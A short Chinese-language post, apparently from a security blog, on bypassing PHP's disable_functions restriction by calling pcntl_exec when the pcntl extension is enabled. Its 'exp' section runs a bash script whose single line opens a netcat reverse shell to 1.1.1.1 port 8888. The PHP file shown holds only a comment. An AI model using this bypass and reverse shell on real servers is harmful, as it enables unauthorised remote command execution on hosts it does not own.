## ***利用 pcntl_exec 绕过***
**1\. 前提条件**
PHP安装并启用了pcntl插件
**2\. 基本原理**
利用pcntl_exec()这个pcntl插件专有的命令执行函数来执行系统命令,从而绕过disable_functions
**3\. exp**
> exp.php
“`php
#利用pcntl_exec()执行test.sh
“`
> test.sh
“`bash
#!/bin/bash
nc -e /bin/bash 1.1.1.1 8888 #反弹shell
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容